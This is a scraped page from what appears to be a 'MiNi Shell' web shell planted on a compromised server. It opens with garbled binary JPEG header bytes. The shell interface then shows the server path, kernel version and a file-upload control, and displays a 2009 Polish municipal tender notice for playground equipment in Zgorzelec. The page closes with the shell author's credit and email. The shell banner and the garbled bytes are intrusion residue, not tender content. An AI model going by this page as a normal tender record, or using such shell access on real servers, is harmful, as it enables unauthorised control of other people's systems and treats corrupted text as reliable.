JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090511/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090511/73693-N-2009.html

<p class="kh_header"><b>Zgorzelec: Dostawa wraz z montażem nowych urządzeń zabawowych na terenie miasta Zgorzelec</b><br>
<b>Numer ogłoszenia: 73693 - 2009; data zamieszczenia: 11.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wraz z montażem nowych urządzeń zabawowych na terenie miasta Zgorzelec.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa oraz montaż, wraz z pracami przygotowawczymi, fabrycznie nowych urządzeń zabawowych na terenie miasta Zgorzelec.

2.Zakres rzeczowy zadania obejmuje:

1.	prace przygotowawcze (szczegółowo opisane w załączniku Nr 1 do SIWZ)

2.	Wyposażenie placów zabaw:

a.	huśtawka podwójna - 19 szt.
b.	huśtawka wagowa - 15 szt.
c.	piaskownica - 8 szt.
d.	karuzela - 7 szt.
e.	tablica regulaminowa - 8 szt.
f.	sprężynowce - 20 szt.
g.	zestaw zabawowy - 3 komplety, w skład którego wchodzą:
1.	wieża kwadratowa z daszkiem - 2 szt.
2.	wieża strażacka - 1 szt.
3.	zjeżdżalnia - 1 szt.
4.	kładka linowa - 1 szt.
5.	most linowy - 1 szt.
6.	ścianka linowa (pajęczyna) - 1 szt.
7.	komin linowy - 1 szt.
8.	koci grzbiet - 1 szt.
9.	ścianka wspinaczkowa - 1 szt.
h.	zestaw zabawowy - 1 komplet, w skład którego wchodzą:
1.	wieża kwadratowa z daszkiem - 1 szt.
2.	wieża kwadratowa bez daszku z rurą strażacką - 1 szt.
3.	zjeżdżalnia - 1 szt.
4.	pomost wiszący - 1 szt.
5.	most linowy - 1 szt.
6.	dwa wejścia
i.	zestaw zabawowy - 4 komplety, w skład którego wchodzą:
1.	wieża kwadratowa z daszkiem - 1 szt.
2.	zjeżdżalnia - 1 szt.
3.	most linowy - 1 szt.
4.	ścianka linowa (pajęczyna) - 1 szt.
5.	dwa wejścia
j.	drążki do akrobacji - 3 komplety,
k.	urządzenie zabawowe składające się z 25 drewnianych słupów - 1 komplet,
l.	zestaw do koszykówki - 1 komplet,
m.	urządzenie zabawowe o kształcie samochodu - 1 szt.
n.	ławka metalowa - 30 szt.
o.	kosz na śmieci - 20 szt.
p.	fontanna - 1 szt.
q.	ogrodzenia drewniane

3.Realizacja przedmiotu zamówienia nastąpi w trzech etapach:

a.	I etap - prace przygotowawcze, dostawa i montaż urządzeń zabawowych,
b.	II etap - montaż ogrodzeń,
c.	III etap - dostawa fontanny

4.Realizacja przedmiotu zamówienia nastąpi z uwzględnieniem niniejszych postanowień:

4.1  Montaż urządzeń zabawowych nastąpi w wyznaczonych miejscach, uzgodnionych               z Zamawiającym, z zachowaniem wymaganych stref bezpieczeństwa zgodnie                   z normą PN-EN-1176

4.2 Wszystkie urządzenia zabawowe przeznaczone do zamontowania na placach zabaw dla dzieci muszą spełniać wymogi formalne odpowiednie do wieku użytkowników, posiadać certyfikaty bezpieczeństwa i atesty wymagane przez prawo Polskie i prawo Unii Europejskiej.

4.3 Wykonawca zobowiązany będzie do przekazania na składowisko odpadów komunalnych lub zagospodarować zgodnie z programem gospodarki odpadami powstającymi w wyniku działalności firmy zdemontowane urządzenia i odpady powstające przy pracach przygotowawczych.

4.4 Szczegółowy opis przedmiotu zamówienia i jego minimalne parametry zostały określone w Załączniku Nr 1 do SIWZ. Wykonawca może zaoferować urządzenia o lepszych właściwościach, parametrach i cechach określonych przez Zamawiającego.
Obowiązek udowodnienia, że oferowane produkty odpowiadają opisowi przedmiotu 
zamówienia lub stanowią standard wyższy niż wymagany w opisie przedmiotu       
zamówienia spoczywa na Wykonawcy.

4.5 Zamawiający wymaga minimum 36 miesięcznej gwarancji na dostarczone urządzenia,  o których mowa w pkt. 2 ppkt 2 ogłoszenia.

5. Karty katalogowe produktu:
Przez kartę katalogową produktu rozumie się wydruk ze strony producenta lub     autoryzowanego dystrybutora (wraz z odnośnikiem) lub oryginalną kartę papierową producenta. W przypadku braku parametru w wydruku ze strony www lub w karcie, Wykonawca musi dostarczyć kartę katalogową od producenta uwzględniającą wszystkie parametry użytkowe oferowanego produktu. Uzupełnieniem karty katalogowej danego produktu może być również oryginalna aktualna instrukcja techniczna oferowanego produktu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 45.11.12.13-4, 37.50.00.00-3, 37.53.51.00-8, 37.53.52.70-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Wykonawca wniesie wadium w wysokości 7.400,00 zł przed upływem terminu  składania ofert, który został określony w pkt. IV.3.4

2.W zależności od woli wykonawcy wadium może być wnoszone w formach:

a.	pieniądzu (przelew na rachunek bankowy wskazany przez zamawiającego),
b.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
c.	gwarancjach bankowych,
d.	gwarancjach ubezpieczeniowych,
e.	poręczeniach udzielanych przez podmioty, o których mowa w art.. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.)

3.Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego Nr 35124012971111000025654013 w banku PeKaO S.A. I O/Zgorzelec.

Potwierdzeniem tej formy wniesienia wadium będzie kopia przelewu (wpłaty)  
załączona do oferty z dopiskiem Wadium do postępowania nr WZP.341-26/09
		
4.Wykonawca, którego oferta nie będzie zabezpieczona akceptowalną formą wadium zostanie wykluczony z postępowania o udzielenie zamówienia, a jego oferta zostanie odrzucona zgodnie z art. 24 ust. 2 pkt 4 ustawy Prawo zamówień publicznych.

5.Zamawiający zwróci niezwłocznie wadium, jeżeli:
1.	upłynął termin związania ofertą,

2.	zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy,

3.	Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.

6.Z zastrzeżeniem pkt. 6 a, Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy:
1.	który wycofał ofertę przed upływem terminu składania ofert,

2.	który został wykluczony z postępowania,

3.	którego oferta została odrzucona.

6 a   Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.

7.Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
8.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,

2.	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,

3.	Zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.

4.	w przypadku określonym w pkt. 6 a specyfikacji istotnych warunków zamówienia.

9.W przypadku wniesienia wadium w formach innych niż wymienione w pkt. 2 ppkt od b do e z treści dokumentu musi jednoznacznie wynikać, iż wypłata Zamawiającemu sumy gwarancyjnej nastąpi także w przypadku określonym w pkt.6 a.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie Zamówienia mogą  ubiegać się Wykonawcy spełniający warunki określone              w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, czyli:

1 Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli
   ustawy nakładają obowiązek posiadania takich uprawnień.
                
Ocena spełnienia tego warunku odbędzie się na podstawie analizy treści:

a.	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia                    o wpisie do ewidencji działalności  gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania  ofert,

b.	zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt  4-8  ustawy Pzp, wystawione nie wcześniej niż  6 miesięcy przed terminem składania ofert,

c.	zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 9 ustawy Pzp, wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert,

Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 1 a i c składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio dla pkt. 1 a - że nie otwarto jego likwidacji ani nie ogłoszono upadłości, dla pkt. 1 c - nie orzeczono wobec niego zakazu ubiegania się o zamówienie wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W zakresie dokumentu określonego w pkt. 1 b Wykonawca składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania lub przestawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia określonego  w niniejszym postępowaniu, tj.:

a. wykażą dwie wykonane, a w przypadku świadczeń okresowych lub ciągłych również wykonywane dostawy w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostaw stanowiących przedmiot zamówienia tj. polegających na dostawie oraz montażu urządzeń zabawowych, z podaniem ich łącznej wartości brutto nie mniejszej niż 100 tyś. zł oraz daty i miejsca wykonania  z załączeniem dokumentów potwierdzających, że dostawy te zostały wykonane należycie - formularz Nr 3 do SIWZ.

b.	wykażą, iż dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, tj. posiadającymi prawo do wykonywania samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej - formularz Nr 4 do SIWZ.

W celu potwierdzenia opisanego wyżej warunku należy przedstawić  dokument potwierdzający uprawnienia wskazanej przez Wykonawcę osoby w ww. specjalności.
Zamawiający  najpóźniej w dniu podpisania  umowy  będzie żądał   
przedstawienia zaświadczenia z właściwej Izby Samorządu Zawodowego 
dla w/w osoby, potwierdzającego jej przynależność do Izby, aktualnego na dzień  podpisania umowy. 
                         
c.	w przypadku kiedy Wykonawca w wykazie, o którym mowa w  pkt. b wskaże osobę, którą będzie dysponował - do przedmiotowego wykazu musi załączyć pisemne zobowiązania innych podmiotów do udostępnienia osoby zdolnej do wykonania zamówienia.

3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj.    
              
a. dołączą  polisę, a w przypadku jej braku inny dokument  potwierdzający,
   że Wykonawca jest  ubezpieczony od odpowiedzialności cywilnej w zakresie    prowadzonej działalności.
                        
        
4.Nie podlegają wykluczeniu z postępowania o zamówienie publiczne zgodnie                            z art.24 ust.  1 i   2 ustawy Prawo zamówień publicznych.

5.Złożą oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie  
   Zamówienia  /oświadczenie zostało określone formularzem Nr 2 do SIWZ/

Zamawiający dokona oceny spełnienia każdego z  warunków na podstawie załączonych do oferty dokumentów, o których mowa w pkt. 10  SIWZ  metodą spełnia /  nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający wymaga złożenia dokumentów potwierdzających spełnianie warunków udziału  w postępowaniu, zgodnie z treścią rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane. W celu:

1. potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej 
    działalności  lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z  dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, zwanej dalej ustawą, zamawiający żąda  następujących dokumentów:

a.	Oryginału lub kopii aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,                  

b.	Zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust. 1  pkt. 4-8 ustawy Pzp, wystawionego nie wcześniej niż na 6 miesięcy przed terminem składania ofert, 

c.	Zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Pzp, wystawionego nie wcześniej niż na 6 miesięcy przed terminem składania ofert,

2. potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia zamawiający  żąda następujących dokumentów:

a.	Wypełnionego formularza wykazu zrealizowanych/wykonywanych dostaw zgodnie z zapisem w pkt. 9.2 a SIWZ - formularz Nr 3  do SIWZ,

b.	Wykazu osób  zgodnego z zapisem w pkt. 9.2 b SIWZ - formularz Nr 4 do SIWZ.

c.	Pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. b, Wykonawca wskazał osoby, którymi będzie dysponował.

3. potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej 
    zapewniającej wykonanie zamówienia, Zamawiający żąda:

a.	Polisy lub innego dokumentu ubezpieczenia zgodnie z zapisem            
        w pkt. 9.3 SIWZ.

4.	Oświadczenie Wykonawcy, że posiada niezbędny potencjał finansowy, kadrowy,
        techniczny oraz doświadczenie niezbędne do realizacji zamówienia oraz, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy Prawo zamówień publicznych złożone na druku stanowiącym formularz nr 2  do SIWZ . 

5. W celu potwierdzenia spełniania wymagań określonych przez Zamawiającego, do oferty na podstawie art. 25 ust. 1 pkt. 2 ustawy Pzp, należy dołączyć:

a.	Karty katalogowe oferowanego produktu lub inne dokumenty zawierające zdjęcia i parametry oferowanych produktów, przy uwzględnieniu zapisu w pkt. 3.4 SIWZ - z wyłączeniem ogrodzeń.

W przypadku złożenia oferty wspólnej, dokumenty o których mowa w pkt. 1 od a do c  składa każdy  z wykonawców. 

Wymagania dotyczące oferty

Do oferty Wykonawca musi złożyć następujące dokumenty, pod rygorem odrzucenia  oferty  zgodnie z art. 89 ust. 1 pkt. 2 , z zastrzeżeniem art. 87 ust. 2 pkt. 3 ustawy PZP:

1)	wypełniony  formularz ofertowy - formularz Nr 1,
2)	wypełniony formularz cenowy - formularz Nr 1A.

  UWAGA 
      Formularz cenowy należy wypełnić, podając nazwę producenta, symbol lub    
       oznaczenie katalogowe produktu proponowanego urządzenia.      
      Formularz cenowy dotyczy tylko proponowanych przez Wykonawcę urządzeń  zabawowych.
       
3)	wypełniony formularz oświadczenia wskazującego część zamówienia, której wykonawca powierzy podwykonawcom - formularz nr  5  do SIWZ,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Zgorzelcu
59-900 Zgorzelec, ul. Domańskiego 6,pokój nr 6.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2009 godzina 10:00, miejsce: w siedzibie  Zamawiającego tj.:
Punkt Obsługi Interesanta
Urząd Miasta w Zgorzelcu
59-900 Zgorzelec
ul. Domańskiego 7.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com